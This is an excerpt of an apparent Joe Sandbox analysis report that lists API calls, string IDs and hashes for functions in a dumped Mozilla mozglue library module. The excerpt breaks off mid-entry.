                                                                  • EnterCriticalSection.KERNEL32(6C0DE784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D4F2
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D50B
                                                                    • Part of subcall function 6C05CFE0: EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C05CFF6
                                                                    • Part of subcall function 6C05CFE0: LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C05D026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D52E
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC), ref: 6C07D690
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C07D6A6
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7DC), ref: 6C07D712
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D751
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C07D7EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                  • String ID: : (malloc) Error initializing arena$<jemalloc>$3JT/
                                                                  • API String ID: 2690322072-1429268696
                                                                  • Opcode ID: bb2c2bba4521d368b428e606f0932a584ab526b7aeb1dcd17086a49876b09bb9
                                                                  • Instruction ID: d8498a75c998be3f95177c8ebffe8b333e4e2c5986d2291b49a8a50b794c581d
                                                                  • Opcode Fuzzy Hash: bb2c2bba4521d368b428e606f0932a584ab526b7aeb1dcd17086a49876b09bb9
                                                                  • Instruction Fuzzy Hash: EB91D571A047018FD768CF28C49071AB7E1FB89314F55892EE56AC7B80EB34F844CBA5
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 6C0B6009
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C0B6024
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C05EE51,?), ref: 6C0B6046
                                                                  • OutputDebugStringA.KERNEL32(?,6C05EE51,?), ref: 6C0B6061
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0B6069
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0B6073
                                                                  • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0B6082
                                                                  • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C0D148E), ref: 6C0B6091
                                                                  • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C05EE51,00000000,?), ref: 6C0B60BA
                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0B60C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3835517998-2178588373
                                                                  • Opcode ID: 92b42702e87fc2e1ab6aa2f6b279957c370390618181e0d23abc429d1e6a671d
                                                                  • Instruction ID: 8fdde0e33f5095675ec298cb55b314edefc387c2c232be5d53543cf38a7aeb11
                                                                  • Opcode Fuzzy Hash: 92b42702e87fc2e1ab6aa2f6b279957c370390618181e0d23abc429d1e6a671d
                                                                  • Instruction Fuzzy Hash: E721A371A002189BDF105F25DC49BAE7BF8FF45618F008528E85AA7240CF75B559CFD2
                                                                  APIs
                                                                  • Sleep.KERNEL32(000007D0), ref: 6C0B4EFF
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0B4F2E
                                                                  • moz_xmalloc.MOZGLUE ref: 6C0B4F52
                                                                  • memset.VCRUNTIME140(00000000,00000000), ref: 6C0B4F62
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0B52B2
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0B52E6
                                                                  • Sleep.KERNEL32(00000010), ref: 6C0B5481
                                                                  • free.MOZGLUE(?), ref: 6C0B5498
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                  • String ID: ($3JT/
                                                                  • API String ID: 4104871533-3198818578
                                                                  • Opcode ID: 04428eaeaf87098a37e53aa88aa9dcbd74580fbf69ce71425969551c97c1a342
                                                                  • Instruction ID: 84acd8d03ecdae9c8fe62c2ab2583540148ac62e4fc5b5d7b749fbc7e9c97138
                                                                  • Opcode Fuzzy Hash: 04428eaeaf87098a37e53aa88aa9dcbd74580fbf69ce71425969551c97c1a342
                                                                  • Instruction Fuzzy Hash: 16F1B071A18B408FC716CF39C85062BB7F9AFD6384F058B2EF946A7651DB31D9428B81
                                                                  APIs
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0951DF
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C09529C
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C0952FF
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C09536D
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0953F7
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C0956C3
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0956E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                  • String ID: MOZ_PROFILER_RECORD_OVERHEADS$3JT/
                                                                  • API String ID: 1227157289-167192157
                                                                  • Opcode ID: 2913c5d540d9ddd4b9e916c14aec4e86d8db7d5044bb2dedaf8743c90a6e5ac7
                                                                  • Instruction ID: 365f097d962751316fd27b6606fb7b279ab6f78faceedbe257c62221e100a224
                                                                  • Opcode Fuzzy Hash: 2913c5d540d9ddd4b9e916c14aec4e86d8db7d5044bb2dedaf8743c90a6e5ac7
                                                                  • Instruction Fuzzy Hash: 24E19D75918F458AC712CF35885036BB7F9BF9B385F10DB0EE8AE2A951DF30E4469201
                                                                  APIs
                                                                  • GetLastError.KERNEL32 ref: 6C0B7046
                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C0B7060
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0B707E
                                                                    • Part of subcall function 6C0681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0681DE
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0B7096
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0B709C
                                                                  • LocalFree.KERNEL32(?), ref: 6C0B70AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                  • String ID: ### ERROR: %s: %s$(null)$3JT/
                                                                  • API String ID: 2989430195-710577592
                                                                  • Opcode ID: a2ab4142c187ce28ae4add0b76392c926e9e2ae586b9d8ab1ca852eb0e008bcd
                                                                  • Instruction ID: 14691047886b21b1c483fb3e18982c0424affed4e3b7c42ff56a3a677e29d1fe
                                                                  • Opcode Fuzzy Hash: a2ab4142c187ce28ae4add0b76392c926e9e2ae586b9d8ab1ca852eb0e008bcd
                                                                  • Instruction Fuzzy Hash: 1401B9B1A00219AFDF005BA4DC4AEAF7FFCEF49215F010425FE05A7241DA7179188BA1
                                                                  APIs
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C0A2C31
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0A2C61
                                                                    • Part of subcall function 6C054DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C054E5A
                                                                    • Part of subcall function 6C054DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C054E97
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0A2C82
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0A2E2D
                                                                    • Part of subcall function 6C0681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0681DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                  • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry$3JT/
                                                                  • API String ID: 801438305-1687464248
                                                                  • Opcode ID: fdbd5348798112463c074bc52758a397d8bd586f79e2740ee6d9adb21081915e
                                                                  • Instruction ID: d40581d35ad85ed333a45c6c37b8ea4e85f60b7970d9c3e69817871d5f5cf1b2
                                                                  • Opcode Fuzzy Hash: fdbd5348798112463c074bc52758a397d8bd586f79e2740ee6d9adb21081915e
                                                                  • Instruction Fuzzy Hash: B991C1706087408FCB24CFA5C49479EF7E1AF89358F504A2DE9998B752DB30E94ACB53
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__aullrem
                                                                  • String ID: -Infinity$NaN$3JT/
                                                                  • API String ID: 3839614884-2190943086
                                                                  • Opcode ID: 9b33685b51ef469ebd59381a1e1e34e5b7b027415e56c410d5cf5cc02693b8ab
                                                                  • Instruction ID: 33782e3e06aa03327a56b65f3515dc5968eb1cdc3320bc1cb989a4acc79877fb
                                                                  • Opcode Fuzzy Hash: 9b33685b51ef469ebd59381a1e1e34e5b7b027415e56c410d5cf5cc02693b8ab
                                                                  • Instruction Fuzzy Hash: FCC1BE71E043198BDB14CFA8C8907DEB7F6FB88714F644529D409BBB80DB72A949CB91
                                                                  APIs
                                                                    • Part of subcall function 6C069B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C0BB92D), ref: 6C069BC8
                                                                    • Part of subcall function 6C069B80: __Init_thread_footer.LIBCMT ref: 6C069BDB
                                                                  • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0603D4,?), ref: 6C0BB955
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C0BB9A5
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C0BBA20
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6C0BBA7B
                                                                  • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C0BBA81
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C0BBA86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1753913139-2178588373
                                                                  • Opcode ID: 12607e038966c91298ed9140b2f69a511499869cf5b3defe9cb19378d998afca
                                                                  • Instruction ID: 18872a95eb9c81202dff9e7be09e5413b68fa6952a5a2614d1735fbfeb6a962c
                                                                  • Opcode Fuzzy Hash: 12607e038966c91298ed9140b2f69a511499869cf5b3defe9cb19378d998afca
                                                                  • Instruction Fuzzy Hash: 5C515671E01219DFDF14CFA9D9C0BDEB7F6AB88318F244129E901B7A04DB32AD458B91
                                                                  APIs
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0B1563), ref: 6C098BD5
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0B1563), ref: 6C098C3A
                                                                  • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C0B1563), ref: 6C098C74
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C0B1563), ref: 6C098CBA
                                                                  • free.MOZGLUE(?), ref: 6C098CCF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2153970598-2178588373
                                                                  • Opcode ID: 4ae4680c57d584607cb77ebb6c1fa4081dc29af45f42df629f53e07fe4730442
                                                                  • Instruction ID: fba221fd016399b6557d53373348654ea31e9924c4beda1ffc0cc316ce0b0fe8
                                                                  • Opcode Fuzzy Hash: 4ae4680c57d584607cb77ebb6c1fa4081dc29af45f42df629f53e07fe4730442
                                                                  • Instruction Fuzzy Hash: F6715975A14B008FD708CF29C48076AB7F1FF99318F459A5EE9899B722E770E884CB41
                                                                  APIs
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C05F2B4
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6C05F2F0
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C05F308
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6C05F36B
                                                                  • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C05F371
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1171715205-2178588373
                                                                  • Opcode ID: 438dc5cf9b1bc6846f4921ba476572bc2df3929e5aa0fd15a8737b7b98390bad
                                                                  • Instruction ID: a9289610994e39ee2214be130f96dfd5ea88b37bcd0ca9c58c996a7eadafb250
                                                                  • Opcode Fuzzy Hash: 438dc5cf9b1bc6846f4921ba476572bc2df3929e5aa0fd15a8737b7b98390bad
                                                                  • Instruction Fuzzy Hash: 1E21C370A06308ABFF109A51CE54BEE76FCEB4575CF504238E42096580D778AA98C761
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0A7A81
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0A7A93
                                                                    • Part of subcall function 6C075C50: GetTickCount64.KERNEL32 ref: 6C075D40
                                                                    • Part of subcall function 6C075C50: EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C075D67
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0A7AA1
                                                                    • Part of subcall function 6C075C50: __aulldiv.LIBCMT ref: 6C075DB4
                                                                    • Part of subcall function 6C075C50: LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C075DED
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C0A7B31
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4054851604-2178588373
                                                                  • Opcode ID: fbc9573483a8949bd619a15dfeee005155381e975d11a1dcf6b93d8f68c614a7
                                                                  • Instruction ID: 6a5b1ce796fb48e4223a87ba7f9726a2c0ae09526855ff2837c9994df11f8655
                                                                  • Opcode Fuzzy Hash: fbc9573483a8949bd619a15dfeee005155381e975d11a1dcf6b93d8f68c614a7
                                                                  • Instruction Fuzzy Hash: 02B180356083408BCB18CFA8C45075FB7E2AFC9318F558A1DE99567796DB70E90BCB82
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C0BC0E9), ref: 6C0BC418
                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C0BC437
                                                                  • FreeLibrary.KERNEL32(?,6C0BC0E9), ref: 6C0BC44C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                  • API String ID: 145871493-2623246514
                                                                  • Opcode ID: b5cfeaef8830eaeca592bf9843e261925f1dffcffee8c1e01aa3f50415a1cbed
                                                                  • Instruction ID: c70a8d552c6517dde16b17b65ddc52f0fb9345bd15049237c451d193b5f4eb11
                                                                  • Opcode Fuzzy Hash: b5cfeaef8830eaeca592bf9843e261925f1dffcffee8c1e01aa3f50415a1cbed
                                                                  • Instruction Fuzzy Hash: 40E0B670601302ABDF00BF71C9087167BFCA716605F24851AAE0892610EFB1F140CB52
                                                                  APIs
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C096D45
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C096E1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4169067295-2178588373
                                                                  • Opcode ID: f5b424536fe229b44a6c9e57b314e880bfaad8de7d9d0474afa6ceef437fda34
                                                                  • Instruction ID: 335827a4f857a07339b4b0ddb096950982b4bd584f843a10295e95730faaf02e
                                                                  • Opcode Fuzzy Hash: f5b424536fe229b44a6c9e57b314e880bfaad8de7d9d0474afa6ceef437fda34
                                                                  • Instruction Fuzzy Hash: FFA16C746183818FCB55CF24C4907AEFBE2BF89308F44995DE88A87751DB70B949CB92
                                                                  APIs
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C0BB720
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6C0BB75A
                                                                  • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C08FE3F,00000000,00000000,?,?,00000000,?,6C08FE3F), ref: 6C0BB760
                                                                  Strings
                                                                  Memory Dump Source
